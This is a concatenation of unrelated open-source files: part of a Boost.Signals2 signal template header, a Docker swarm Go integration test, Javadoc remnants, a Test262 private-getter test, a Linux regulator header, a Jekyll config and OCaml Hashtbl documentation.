unique_lock lock(_mutex);\n if(_shared_state.unique())\n _shared_state->combiner() = combiner;\n else\n _shared_state.reset(new invocation_state(*_shared_state, combiner));\n }\n private:\n typedef Mutex mutex_type;\n\n // slot_invoker is passed to slot_call_iterator_t to run slots\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n class slot_invoker\n {\n public:\n typedef nonvoid_slot_result_type result_type;\n// typename add_reference::type argn\n#define BOOST_SIGNALS2_ADD_REF_ARG(z, n, data) \\\n typename 
add_reference::type \\\n BOOST_SIGNALS2_SIGNATURE_ARG_NAME(~, n, ~)\n// typename add_reference::type arg1, typename add_reference::type arg2, ..., typename add_reference::type argn\n#define BOOST_SIGNALS2_ADD_REF_ARGS(arity) \\\n BOOST_PP_ENUM(arity, BOOST_SIGNALS2_ADD_REF_ARG, ~)\n slot_invoker(BOOST_SIGNALS2_ADD_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) BOOST_PP_IF(BOOST_SIGNALS2_NUM_ARGS, :, )\n#undef BOOST_SIGNALS2_ADD_REF_ARGS\n\n// argn ( argn ) ,\n#define BOOST_SIGNALS2_MISC_STATEMENT(z, n, data) \\\n BOOST_PP_CAT(arg, n) ( BOOST_PP_CAT(arg, n) )\n// arg1(arg1), arg2(arg2), ..., argn(argn)\n BOOST_PP_ENUM_SHIFTED(BOOST_PP_INC(BOOST_SIGNALS2_NUM_ARGS), BOOST_SIGNALS2_MISC_STATEMENT, ~)\n#undef BOOST_SIGNALS2_MISC_STATEMENT\n {}\n result_type operator ()(const connection_body_type &connectionBody) const\n {\n result_type *resolver = 0;\n return m_invoke(connectionBody,\n resolver);\n }\n private:\n#define BOOST_SIGNALS2_ADD_REF_ARG_STATEMENT(z, n, data) \\\n BOOST_SIGNALS2_ADD_REF_ARG(z, n, data) ;\n BOOST_PP_REPEAT(BOOST_SIGNALS2_NUM_ARGS, BOOST_SIGNALS2_ADD_REF_ARG_STATEMENT, ~)\n#undef BOOST_SIGNALS2_ADD_REF_ARG_STATEMENT\n#undef BOOST_SIGNALS2_ADD_REF_ARG\n result_type m_invoke(const connection_body_type &connectionBody,\n const void_type *) const\n {\n connectionBody->slot.slot_function()(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n return void_type();\n }\n result_type m_invoke(const connection_body_type &connectionBody, ...) const\n {\n return connectionBody->slot.slot_function()(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n };\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n // a struct used to optimize (minimize) the number of shared_ptrs that need to be created\n // inside operator()\n class invocation_state\n {\n public:\n invocation_state(const connection_list_type &connections_in,\n const combiner_type &combiner_in): _connection_bodies(new connection_list_type(connections_in)),\n _combiner(new combiner_type(combiner_in))\n {}\n invocation_state(const invocation_state &other, const connection_list_type &connections_in):\n _connection_bodies(new connection_list_type(connections_in)),\n _combiner(other._combiner)\n {}\n invocation_state(const invocation_state &other, const combiner_type &combiner_in):\n _connection_bodies(other._connection_bodies),\n _combiner(new combiner_type(combiner_in))\n {}\n connection_list_type & connection_bodies() { return *_connection_bodies; }\n const connection_list_type & connection_bodies() const { return *_connection_bodies; }\n combiner_type & combiner() { return *_combiner; }\n const combiner_type & combiner() const { return *_combiner; }\n private:\n invocation_state(const invocation_state &);\n\n shared_ptr _connection_bodies;\n shared_ptr _combiner;\n };\n // Destructor of invocation_janitor does some cleanup when a signal invocation completes.\n // Code can't be put directly in signal's operator() due to complications from void return types.\n class invocation_janitor\n {\n public:\n typedef BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS) signal_type;\n invocation_janitor\n (\n const slot_call_iterator_cache_type &cache,\n const signal_type &sig,\n const connection_list_type *connection_bodies\n ):_cache(cache), _sig(sig), _connection_bodies(connection_bodies)\n {}\n ~invocation_janitor()\n {\n // force a full cleanup of disconnected slots if there are too many\n if(_cache.disconnected_slot_count > _cache.connected_slot_count)\n {\n _sig.force_cleanup_connections(_connection_bodies);\n }\n }\n 
private:\n const slot_call_iterator_cache_type &_cache;\n const signal_type &_sig;\n const connection_list_type *_connection_bodies;\n };\n\n // clean up disconnected connections\n void nolock_cleanup_connections_from(bool grab_tracked,\n const typename connection_list_type::iterator &begin, unsigned count = 0) const\n {\n BOOST_ASSERT(_shared_state.unique());\n typename connection_list_type::iterator it;\n unsigned i;\n for(it = begin, i = 0;\n it != _shared_state->connection_bodies().end() && (count == 0 || i < count);\n ++i)\n {\n bool connected;\n {\n unique_lock lock(**it);\n if(grab_tracked)\n (*it)->nolock_slot_expired();\n connected = (*it)->nolock_nograb_connected();\n }// scoped lock destructs here, safe to erase now\n if(connected == false)\n {\n it = _shared_state->connection_bodies().erase((*it)->group_key(), it);\n }else\n {\n ++it;\n }\n }\n _garbage_collector_it = it;\n }\n // clean up a few connections in constant time\n void nolock_cleanup_connections(bool grab_tracked, unsigned count) const\n {\n BOOST_ASSERT(_shared_state.unique());\n typename connection_list_type::iterator begin;\n if(_garbage_collector_it == _shared_state->connection_bodies().end())\n {\n begin = _shared_state->connection_bodies().begin();\n }else\n {\n begin = _garbage_collector_it;\n }\n nolock_cleanup_connections_from(grab_tracked, begin, count);\n }\n /* Make a new copy of the slot list if it is currently being read somewhere else\n */\n void nolock_force_unique_connection_list()\n {\n if(_shared_state.unique() == false)\n {\n _shared_state.reset(new invocation_state(*_shared_state, _shared_state->connection_bodies()));\n nolock_cleanup_connections_from(true, _shared_state->connection_bodies().begin());\n }else\n {\n /* We need to try and check more than just 1 connection here to avoid corner\n cases where certain repeated connect/disconnect patterns cause the slot\n list to grow without limit. 
*/\n nolock_cleanup_connections(true, 2);\n }\n }\n // force a full cleanup of the connection list\n void force_cleanup_connections(const connection_list_type *connection_bodies) const\n {\n unique_lock list_lock(_mutex);\n // if the connection list passed in as a parameter is no longer in use,\n // we don't need to do any cleanup.\n if(&_shared_state->connection_bodies() != connection_bodies)\n {\n return;\n }\n if(_shared_state.unique() == false)\n {\n _shared_state.reset(new invocation_state(*_shared_state, _shared_state->connection_bodies()));\n }\n nolock_cleanup_connections_from(false, _shared_state->connection_bodies().begin());\n }\n shared_ptr get_readable_state() const\n {\n unique_lock list_lock(_mutex);\n return _shared_state;\n }\n connection_body_type create_new_connection(const slot_type &slot)\n {\n nolock_force_unique_connection_list();\n return connection_body_type(new connection_body(slot));\n }\n void do_disconnect(const group_type &group, mpl::bool_ is_group)\n {\n disconnect(group);\n }\n template\n void do_disconnect(const T &slot, mpl::bool_ is_group)\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n unique_lock lock(**it);\n if((*it)->slot.slot_function() == slot)\n {\n (*it)->nolock_disconnect();\n }else\n {\n // check for wrapped extended slot\n bound_extended_slot_function_type *fp;\n fp = (*it)->slot.slot_function().template target();\n if(fp && *fp == slot)\n {\n (*it)->nolock_disconnect();\n }\n }\n }\n }\n // connect slot\n connection nolock_connect(const slot_type &slot, connect_position position)\n {\n connection_body_type newConnectionBody =\n create_new_connection(slot);\n group_key_type group_key;\n if(position == at_back)\n {\n group_key.first = back_ungrouped_slots;\n _shared_state->connection_bodies().push_back(group_key, newConnectionBody);\n }else\n {\n group_key.first = front_ungrouped_slots;\n _shared_state->connection_bodies().push_front(group_key, newConnectionBody);\n }\n newConnectionBody->set_group_key(group_key);\n return connection(newConnectionBody);\n }\n connection nolock_connect(const group_type &group,\n const slot_type &slot, connect_position position)\n {\n connection_body_type newConnectionBody =\n create_new_connection(slot);\n // update map to first connection body in group if needed\n group_key_type group_key(grouped_slots, group);\n newConnectionBody->set_group_key(group_key);\n if(position == at_back)\n {\n _shared_state->connection_bodies().push_back(group_key, newConnectionBody);\n }else // at_front\n {\n _shared_state->connection_bodies().push_front(group_key, newConnectionBody);\n }\n return connection(newConnectionBody);\n }\n\n // _shared_state is mutable so we can do force_cleanup_connections during a const invocation\n mutable shared_ptr _shared_state;\n mutable typename connection_list_type::iterator _garbage_collector_it;\n // connection list mutex must never be locked when attempting a blocking lock on a slot,\n // or you could deadlock.\n mutable mutex_type _mutex;\n };\n\n template\n class BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n }\n\n template\n class BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n\n template\n class BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION: public signal_base,\n public detail::BOOST_SIGNALS2_STD_FUNCTIONAL_BASE\n (typename 
detail::result_type_wrapper::type)\n {\n typedef detail::BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n impl_class;\n public:\n typedef detail::BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n weak_signal_type;\n friend class detail::BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n ;\n\n typedef SlotFunction slot_function_type;\n // typedef slotN slot_type;\n typedef typename impl_class::slot_type slot_type;\n typedef typename impl_class::extended_slot_function_type extended_slot_function_type;\n typedef typename impl_class::extended_slot_type extended_slot_type;\n typedef typename slot_function_type::result_type slot_result_type;\n typedef Combiner combiner_type;\n typedef typename impl_class::result_type result_type;\n typedef Group group_type;\n typedef GroupCompare group_compare_type;\n typedef typename impl_class::slot_call_iterator\n slot_call_iterator;\n typedef typename mpl::identity::type signature_type;\n\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n\n// typedef Tn argn_type;\n#define BOOST_SIGNALS2_MISC_STATEMENT(z, n, data) \\\n typedef BOOST_PP_CAT(T, BOOST_PP_INC(n)) BOOST_PP_CAT(BOOST_PP_CAT(arg, BOOST_PP_INC(n)), _type);\n BOOST_PP_REPEAT(BOOST_SIGNALS2_NUM_ARGS, BOOST_SIGNALS2_MISC_STATEMENT, ~)\n#undef BOOST_SIGNALS2_MISC_STATEMENT\n#if BOOST_SIGNALS2_NUM_ARGS == 1\n typedef arg1_type argument_type;\n#elif BOOST_SIGNALS2_NUM_ARGS == 2\n typedef arg1_type first_argument_type;\n typedef arg2_type second_argument_type;\n#endif\n\n template class arg : public\n detail::BOOST_SIGNALS2_PREPROCESSED_ARG_N_TYPE_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n \n {};\n\n BOOST_STATIC_CONSTANT(int, arity = BOOST_SIGNALS2_NUM_ARGS);\n\n#else // BOOST_NO_VARIADIC_TEMPLATES\n\n template class arg\n {\n public:\n typedef typename detail::variadic_arg_type::type type;\n };\n BOOST_STATIC_CONSTANT(int, arity = sizeof...(Args));\n\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n\n BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)(const combiner_type &combiner = combiner_type(),\n const group_compare_type &group_compare = group_compare_type()):\n _pimpl(new impl_class(combiner, group_compare))\n {};\n virtual ~BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)()\n {\n disconnect_all_slots();\n }\n connection connect(const slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect(slot, position);\n }\n connection connect(const group_type &group,\n const slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect(group, slot, position);\n }\n connection connect_extended(const extended_slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect_extended(slot, position);\n }\n connection connect_extended(const group_type &group,\n const extended_slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect_extended(group, slot, position);\n }\n void disconnect_all_slots()\n {\n (*_pimpl).disconnect_all_slots();\n }\n void disconnect(const group_type &group)\n {\n (*_pimpl).disconnect(group);\n }\n template \n void disconnect(const T &slot)\n {\n (*_pimpl).disconnect(slot);\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n return (*_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n return (*_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n std::size_t num_slots() 
const\n {\n return (*_pimpl).num_slots();\n }\n bool empty() const\n {\n return (*_pimpl).empty();\n }\n combiner_type combiner() const\n {\n return (*_pimpl).combiner();\n }\n void set_combiner(const combiner_type &combiner)\n {\n return (*_pimpl).set_combiner(combiner);\n }\n protected:\n virtual shared_ptr lock_pimpl() const\n {\n return _pimpl;\n }\n private:\n shared_ptr\n _pimpl;\n };\n\n namespace detail\n {\n // wrapper class for storing other signals as slots with automatic lifetime tracking\n template\n class BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n\n template\n class BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION\n {\n public:\n typedef typename BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n ::result_type\n result_type;\n\n BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n (const BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n \n &signal):\n _weak_pimpl(signal._pimpl)\n {}\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n shared_ptr >\n shared_pimpl(_weak_pimpl.lock());\n if(shared_pimpl == 0) boost::throw_exception(expired_slot());\n return (*shared_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n shared_ptr >\n shared_pimpl(_weak_pimpl.lock());\n if(shared_pimpl == 0) boost::throw_exception(expired_slot());\n return (*shared_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n private:\n boost::weak_ptr > _weak_pimpl;\n };\n\n#ifndef BOOST_NO_VARIADIC_TEMPLATES\n template\n class extended_signature: public variadic_extended_signature\n {};\n#else // BOOST_NO_VARIADIC_TEMPLATES\n template\n class extended_signature;\n // partial template specialization\n template\n class extended_signature\n {\n public:\n// typename function_traits::result_type (\n// const boost::signals2::connection &,\n// typename function_traits::arg1_type,\n// typename function_traits::arg2_type,\n// ...,\n// typename function_traits::argn_type)\n#define BOOST_SIGNALS2_EXT_SIGNATURE(arity, Signature) \\\n typename function_traits::result_type ( \\\n const boost::signals2::connection & BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS) \\\n BOOST_PP_ENUM(arity, BOOST_SIGNALS2_SIGNATURE_TO_ARGN_TYPE, Signature) )\n typedef function function_type;\n#undef BOOST_SIGNALS2_EXT_SIGNATURE\n };\n\n template\n class signalN;\n // partial template specialization\n template\n class signalN\n {\n public:\n typedef BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)<\n BOOST_SIGNALS2_PORTABLE_SIGNATURE(BOOST_SIGNALS2_NUM_ARGS, Signature),\n Combiner, Group,\n GroupCompare, SlotFunction, ExtendedSlotFunction, Mutex> type;\n };\n\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n\n } // namespace detail\n } // namespace signals2\n} // namespace boost\n\n#undef BOOST_SIGNALS2_NUM_ARGS\n#undef BOOST_SIGNALS2_SIGNAL_TEMPLATE_INSTANTIATION\n"} {"text": "// +build !windows\n\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\n\t\"github.com/docker/docker/api/types/swarm\"\n\t\"github.com/docker/docker/integration-cli/checker\"\n\t\"github.com/go-check/check\"\n)\n\nfunc (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) {\n\td := s.AddDaemon(c, true, true)\n\tout, err := d.Cmd(\"service\", \"create\", \"--detach\", \"--no-resolve-image\", \"--name=test\", \"busybox\", \"top\")\n\tc.Assert(err, 
checker.IsNil, check.Commentf(\"%s\", out))\n\tservice := d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 0)\n\n\t// add label to empty set\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-add\", \"foo=bar\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 1)\n\tc.Assert(service.Spec.Labels[\"foo\"], checker.Equals, \"bar\")\n\n\t// add label to non-empty set\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-add\", \"foo2=bar\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 2)\n\tc.Assert(service.Spec.Labels[\"foo2\"], checker.Equals, \"bar\")\n\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-rm\", \"foo2\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 1)\n\tc.Assert(service.Spec.Labels[\"foo2\"], checker.Equals, \"\")\n\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-rm\", \"foo\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 0)\n\tc.Assert(service.Spec.Labels[\"foo\"], checker.Equals, \"\")\n\n\t// now make sure we can add again\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-add\", \"foo=bar\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 1)\n\tc.Assert(service.Spec.Labels[\"foo\"], checker.Equals, \"bar\")\n}\n\nfunc (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) {\n\td := s.AddDaemon(c, true, true)\n\ttestName := \"test_secret\"\n\tid := d.CreateSecret(c, swarm.SecretSpec{\n\t\tAnnotations: swarm.Annotations{\n\t\t\tName: testName,\n\t\t},\n\t\tData: []byte(\"TESTINGDATA\"),\n\t})\n\tc.Assert(id, checker.Not(checker.Equals), \"\", check.Commentf(\"secrets: %s\", id))\n\ttestTarget := \"testing\"\n\tserviceName := \"test\"\n\n\tout, err := d.Cmd(\"service\", \"create\", \"--detach\", \"--no-resolve-image\", \"--name\", serviceName, \"busybox\", \"top\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\t// add secret\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--secret-add\", fmt.Sprintf(\"source=%s,target=%s\", testName, testTarget))\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tvar refs []swarm.SecretReference\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 1)\n\n\tc.Assert(refs[0].SecretName, checker.Equals, testName)\n\tc.Assert(refs[0].File, checker.Not(checker.IsNil))\n\tc.Assert(refs[0].File.Name, checker.Equals, testTarget)\n\n\t// remove\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--secret-rm\", testName)\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tc.Assert(json.Unmarshal([]byte(out), &refs), 
checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 0)\n}\n\nfunc (s *DockerSwarmSuite) TestServiceUpdateConfigs(c *check.C) {\n\td := s.AddDaemon(c, true, true)\n\ttestName := \"test_config\"\n\tid := d.CreateConfig(c, swarm.ConfigSpec{\n\t\tAnnotations: swarm.Annotations{\n\t\t\tName: testName,\n\t\t},\n\t\tData: []byte(\"TESTINGDATA\"),\n\t})\n\tc.Assert(id, checker.Not(checker.Equals), \"\", check.Commentf(\"configs: %s\", id))\n\ttestTarget := \"/testing\"\n\tserviceName := \"test\"\n\n\tout, err := d.Cmd(\"service\", \"create\", \"--detach\", \"--no-resolve-image\", \"--name\", serviceName, \"busybox\", \"top\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\t// add config\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--config-add\", fmt.Sprintf(\"source=%s,target=%s\", testName, testTarget))\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tvar refs []swarm.ConfigReference\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 1)\n\n\tc.Assert(refs[0].ConfigName, checker.Equals, testName)\n\tc.Assert(refs[0].File, checker.Not(checker.IsNil))\n\tc.Assert(refs[0].File.Name, checker.Equals, testTarget)\n\n\t// remove\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--config-rm\", testName)\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 0)\n}\n"} {"text": "\n\n\n\n\nHTMLLabelElement (Java SE 12 & JDK 12 )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Module jdk.xml.dom
Interface HTMLLabelElement

Method Detail

getForm

HTMLFormElement getForm()

Returns the FORM element containing this control. Returns null if this control is not within the context of a form.

getAccessKey

String getAccessKey()

A single character access key to give access to the form control. See the accesskey attribute definition in HTML 4.0.

setAccessKey

void setAccessKey(String accessKey)

getHtmlFor

String getHtmlFor()

This attribute links this label with another form control by id attribute. See the for attribute definition in HTML 4.0.

setHtmlFor

void setHtmlFor(String htmlFor)
\n\n\n\n\n"} {"text": "// This file was procedurally generated from the following sources:\n// - src/class-elements/rs-private-getter-alt.case\n// - src/class-elements/productions/cls-decl-wrapped-in-sc.template\n/*---\ndescription: Valid PrivateName as private getter (fields definition wrapped in semicolons)\nesid: prod-FieldDefinition\nfeatures: [class-methods-private, class-fields-private, class, class-fields-public]\nflags: [generated]\ninfo: |\n ClassElement :\n MethodDefinition\n ...\n ;\n\n MethodDefinition :\n ...\n get ClassElementName ( ){ FunctionBody }\n ...\n\n ClassElementName :\n PropertyName\n PrivateName\n\n PrivateName ::\n # IdentifierName\n\n IdentifierName ::\n IdentifierStart\n IdentifierName IdentifierPart\n\n IdentifierStart ::\n UnicodeIDStart\n $\n _\n \\ UnicodeEscapeSequence\n\n IdentifierPart::\n UnicodeIDContinue\n $\n \\ UnicodeEscapeSequence\n \n\n UnicodeIDStart::\n any Unicode code point with the Unicode property \"ID_Start\"\n\n UnicodeIDContinue::\n any Unicode code point with the Unicode property \"ID_Continue\"\n\n NOTE 3\n The sets of code points with Unicode properties \"ID_Start\" and\n \"ID_Continue\" include, respectively, the code points with Unicode\n properties \"Other_ID_Start\" and \"Other_ID_Continue\".\n\n---*/\n\n\nclass C {\n ;;;;\n ;;;;;;#$_; #__; #\\u{6F}_; #℘_; #ZW_‌_NJ_; #ZW_‍_J_;\n get #$() {\n return this.#$_;\n }\n get #_() {\n return this.#__;\n }\n get #\\u{6F}() {\n return this.#\\u{6F}_;\n }\n get #℘() {\n return this.#℘_;\n }\n get #ZW_‌_NJ() {\n return this.#ZW_‌_NJ_;\n }\n get #ZW_‍_J() {\n return this.#ZW_‍_J_;\n }\n;;;;;;;\n ;;;;\n $(value) {\n this.#$_ = value;\n return this.#$;\n }\n _(value) {\n this.#__ = value;\n return this.#_;\n }\n \\u{6F}(value) {\n this.#\\u{6F}_ = value;\n return this.#\\u{6F};\n }\n ℘(value) {\n this.#℘_ = value;\n return this.#℘;\n }\n ZW_‌_NJ(value) {\n this.#ZW_‌_NJ_ = value;\n return this.#ZW_‌_NJ;\n }\n ZW_‍_J(value) {\n this.#ZW_‍_J_ = value;\n return this.#ZW_‍_J;\n }\n\n}\n\nvar c = new C();\n\nassert.sameValue(c.$(1), 1);\nassert.sameValue(c._(1), 1);\nassert.sameValue(c.\\u{6F}(1), 1);\nassert.sameValue(c.℘(1), 1);\nassert.sameValue(c.ZW_‌_NJ(1), 1);\nassert.sameValue(c.ZW_‍_J(1), 1);\n"} {"text": "/* SPDX-License-Identifier: GPL-2.0-only */\n/*\n * Copyright (C) ST-Ericsson SA 2010\n *\n * Author: Bengt Jonsson for ST-Ericsson,\n *\t Jonas Aaberg for ST-Ericsson\n */\n\n#ifndef DBX500_REGULATOR_H\n#define DBX500_REGULATOR_H\n\n#include \n\n/**\n * struct dbx500_regulator_info - dbx500 regulator information\n * @desc: regulator description\n * @is_enabled: status of the regulator\n * @epod_id: id for EPOD (power domain)\n * @is_ramret: RAM retention switch for EPOD (power domain)\n *\n */\nstruct dbx500_regulator_info {\n\tstruct regulator_desc desc;\n\tbool is_enabled;\n\tu16 epod_id;\n\tbool is_ramret;\n\tbool exclude_from_power_state;\n};\n\nvoid power_state_active_enable(void);\nint power_state_active_disable(void);\n\n\n#ifdef CONFIG_REGULATOR_DEBUG\nint ux500_regulator_debug_init(struct platform_device *pdev,\n\t\t\t struct dbx500_regulator_info *regulator_info,\n\t\t\t int num_regulators);\n\nint ux500_regulator_debug_exit(void);\n#else\n\nstatic inline int ux500_regulator_debug_init(struct platform_device *pdev,\n\t\t\t struct dbx500_regulator_info *regulator_info,\n\t\t\t int num_regulators)\n{\n\treturn 0;\n}\n\nstatic inline int ux500_regulator_debug_exit(void)\n{\n\treturn 0;\n}\n\n#endif\n#endif\n"} {"text": "# Licensed to the Apache Software Foundation (ASF) under one\n# 
or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License\n\nexclude:\n - \"*.md\"\n - \"build_docs.sh\"\n - \"check_links.sh\"\n - \"content\"\n - \"content_en\"\n - \"content_zh\"\n\ninclude:\n - \"*.zh.md\"\n"} {"text": "\n\n \n \n\n\n"} {"text": "
\n
\n

Module type Hashtbl.SeededHashedType

\n\n
module type SeededHashedType = sig .. end
\nThe input signature of the functor Hashtbl.MakeSeeded.
\nSince 4.00.0
\n
\n
\n\n
type t;\n
\n
\nThe type of the hashtable keys.
\n
\n\n\n
let equal: (t, t) => bool;\n
\nThe equality predicate used to compare keys.
\n
\n\n
let hash: (int, t) => int;\n
\nA seeded hashing function on keys. The first argument is\n the seed. It must be the case that if equal x y is true,\n then hash seed x = hash seed y for any value of seed.\n A suitable choice for hash is the function Hashtbl.seeded_hash\n below.
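For illustration only (this sketch is not part of the original manual page, and the names StringKey, StringTbl and tbl are invented here), a string-keyed module satisfying SeededHashedType can simply delegate to Hashtbl.seeded_hash, which keeps hash consistent with equal for every value of the seed, and can then be passed to Hashtbl.MakeSeeded:

    module StringKey = {
      type t = string;
      let equal = (a, b) => String.equal(a, b);
      /* delegate to the stdlib seeded hash: equal keys hash identically for any seed */
      let hash = (seed, s) => Hashtbl.seeded_hash(seed, s);
    };

    module StringTbl = Hashtbl.MakeSeeded(StringKey);

    let tbl = StringTbl.create(16);
    let () = StringTbl.add(tbl, "answer", 42);

Because hash receives the seed explicitly, a table created with StringTbl.create(~random=true, 16) can use a per-table seed without any change to the key module.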
\n
\n
